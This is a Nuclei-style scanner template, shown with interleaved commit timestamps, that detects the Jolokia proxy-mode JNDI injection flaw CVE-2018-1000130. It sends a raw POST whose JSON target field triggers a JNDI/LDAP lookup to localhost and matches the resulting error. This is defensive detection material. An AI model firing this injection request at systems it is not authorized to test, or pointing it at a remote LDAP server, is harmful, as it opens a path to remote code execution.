2021-06-22 12:32:30 +00:00
id : CVE-2018-1000130
info :
name : Jolokia Agent Proxy JNDI Code Injection
author : milo2012
severity : high
description : A JNDI Injection vulnerability exists in Jolokia agent in the proxy mode that allows a remote attacker to run arbitrary Java code on the server.
tags : cve,cve2018,jolokia,rce
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 8.10
cve-id : CVE-2018-1000130
cwe-id : CWE-74
reference :
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://access.redhat.com/errata/RHSA-2018:2669
2021-06-22 12:32:30 +00:00
requests :
- raw :
- |
POST /jolokia/read/getDiagnosticOptions HTTP/1.1
Host : {{Hostname}}
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.
Content-Type : application/x-www-form-urlencoded
{
2021-09-08 12:17:19 +00:00
"type" : "read" ,
"mbean" : "java.lang:type=Memory" ,
"target" : {
"url" : "service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat"
}
2021-06-22 12:32:30 +00:00
}
2021-06-22 16:33:06 +00:00
matchers-condition : and
2021-06-22 12:32:30 +00:00
matchers :
- type : word
words :
- "Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"
part : body
2021-09-08 12:17:19 +00:00
2021-06-22 12:32:30 +00:00
- type : status
status :
2021-06-22 16:33:06 +00:00
- 200